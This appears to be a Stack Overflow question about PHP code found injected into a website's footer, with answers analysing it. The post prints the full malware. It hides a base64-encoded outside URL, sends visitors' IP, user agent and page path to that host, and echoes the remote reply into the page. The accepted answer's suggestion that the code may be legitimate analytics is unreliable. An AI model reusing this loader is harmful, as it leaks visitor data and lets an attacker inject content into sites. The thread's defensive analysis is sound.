# Trojan code embeded in my website pages. What is the meaning of this code?

Tags: php

Today when I opened my website, ESET NOD32 warned me of a trojan and blocked the website.
When I analyzed the code, the following code was in the footer... What is this code for and what advantages can he(hacker) get by inserting this code into my website?

```
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>
```

Comment: Seems hot. Duplicate of http://stackoverflow.com/questions/16264707/opencart-ajax-json-response-unknown-characters. I just typed up a full explanation/analysis/decoder in [my answer](http://stackoverflow.com/a/16413121/588079) there

Answer (score 4, accepted):

It looks like some sort of analytics code to me. It sends details on the URL requested, remote IP address, browser user-agent, etc to "http://mbrowserstats.com/statH/stat.php". I'm not familiar with that particular site, but it may be legit. Sometimes antivirus software reports these things incorrectly.

Based on a few searches, it seems a bit 50/50. It seems like it doesn't do huge harm, but may be distributed by hacking. A few sample pages I found about it:

- http://www.wjunction.com/16-webmaster-discussion/166680-site-hacked-here-code-pls-help.html
- http://ninjafirewall.com/malware/index.php?threat=2013-02-22.01
- http://onlinelinkscan.com/results/mbrowserstats-comstatestat-php/
- http://www.statscrop.com/www/mbrowserstats.com

Probably safest to remove it, and follow some of the suggestions on preventing reoccurrence.

Comment: that stat.php looks scary enough in information terms (given that it shows blank page on run). Just delete that curl code.. and surely double check PHP file permissions.

Comment: @vlzvl the file permissions are set to 755.. what it should be?

Comment: After auditing a website that contained numerous injections/infections this was determined to be a malicious injection. Every writeable file with the names `index.php`, `page.php`, `footer.php`, `template.php` had been altered.

Answer (score 1):

This doesn't look legitimate. A [search for one of the strings in the code](https://www.google.co.uk/search?output=search&q=This+code+use+for+global+bot+statistic) reveals that its likely purpose is to add links to your site only when a selection of search engines visit.

Thus, it'll look fine when you go to the site itself, but it'll be full of spam-type advertising for the search engines, who in turn will see your site as endorsing a variety of links designed to boost their page ranking.

In any case, if you don't specifically recognise the code, keep your users safe and get rid of it. If you didn't install it, you should work out how the code got installed, so it doesn't happen again.